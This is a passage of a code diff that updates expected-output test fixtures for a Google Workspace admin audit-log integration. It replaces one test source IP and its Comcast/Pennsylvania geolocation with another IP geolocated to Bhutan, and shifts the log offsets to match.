         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 2798,
+        "log.offset": 2791,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -467,7 +435,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REVOKE_ASP\",\"parameters\":[{\"name\":\"ASP_ID\",\"value\":\"id\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -481,27 +449,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3184,
+        "log.offset": 3176,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -525,7 +489,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"TOGGLE_AUTOMATIC_CONTACT_SHARING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -539,27 +503,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 3589,
+        "log.offset": 3580,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -583,7 +543,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD\",\"parameters\":[{\"name\":\"BULK_UPLOAD_FAIL_USERS_NUMBER\",\"value\":\"1\"},{\"name\":\"BULK_UPLOAD_TOTAL_USERS_NUMBER\",\"value\":\"10\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info"
@@ -597,26 +557,22 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4020,
+        "log.offset": 4010,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -637,7 +593,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"BULK_UPLOAD_NOTIFICATION_SENT\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "info",
@@ -651,27 +607,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4499,
+        "log.offset": 4488,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -695,7 +647,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CANCEL_USER_INVITE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -709,27 +661,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 4937,
+        "log.offset": 4925,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -753,7 +701,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_CUSTOM_FIELD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"USER_CUSTOM_FIELD\",\"value\":\"custom\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -769,27 +717,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5364,
+        "log.offset": 5351,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -813,7 +757,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_EXTERNAL_ID\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -828,27 +772,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 5868,
+        "log.offset": 5854,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -872,7 +812,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_GENDER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -887,27 +827,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6325,
+        "log.offset": 6310,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -931,7 +867,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_IM\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -946,27 +882,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 6777,
+        "log.offset": 6761,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -990,7 +922,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ENABLE_USER_IP_WHITELIST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1005,27 +937,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7225,
+        "log.offset": 7208,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
         "source.user.domain": "bar.com",
         "source.user.email": "foo@bar.com",
         "source.user.id": "1",
@@ -1049,7 +977,7 @@
         "event.dataset": "google_workspace.admin",
         "event.id": "1",
         "event.module": "google_workspace",
-        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
+        "event.original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}",
         "event.provider": "admin",
         "event.type": [
             "change",
@@ -1064,27 +992,23 @@
         "google_workspace.kind": "admin#reports#activity",
         "google_workspace.organization.domain": "elastic.com",
         "input.type": "log",
-        "log.offset": 7683,
+        "log.offset": 7665,
         "organization.id": "1",
         "related.ip": [
-            "98.235.162.24"
+            "67.43.156.13"
         ],
         "related.user": [
             "foo",
             "user"
         ],
         "service.type": "google_workspace",
-        "source.as.number": 7922,
-        "source.as.organization.name": "Comcast Cable Communications, LLC",
-        "source.geo.city_name": "State College",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 40.7957,
-        "source.geo.location.lon": -77.8618,
-        "source.geo.region_iso_code": "US-PA",
-        "source.geo.region_name": "Pennsylvania",
-        "source.ip": "98.235.162.24",
+        "source.as.number": 35908,
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "BT",
+        "source.geo.country_name": "Bhutan",
+        "source.geo.location.lat": 27.5,
+        "source.geo.location.lon": 90.5,
+        "source.ip": "67.43.156.13",
